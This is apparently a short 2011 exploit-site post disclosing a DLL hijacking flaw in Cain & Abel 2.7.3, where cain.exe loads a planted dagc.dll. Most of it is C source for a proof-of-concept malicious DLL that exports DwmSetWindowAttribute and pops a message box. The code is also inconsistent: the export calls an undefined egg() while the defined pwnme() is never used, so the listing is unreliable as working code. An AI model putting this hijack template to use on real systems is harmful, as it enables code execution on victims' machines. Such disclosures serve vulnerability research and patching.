Cain And Abel 2.7.3 DLL Hijacking
Posted on 08 February 2011
############################################# Cain & Able dll hijacking vulnerability software : cain - http://oxid.it version : 2.7.3 author : d3c0der - d3c0der@hotmail.com website : www.attackerz.ir ############################################ file : cain.exe Vulnerable dll : dagc.dll ############################################# #include <windows.h> #define DllExport __declspec (dllexport) DllExport void DwmSetWindowAttribute() { egg(); } int pwnme() { MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK); exit(0); return 0; } ##############################################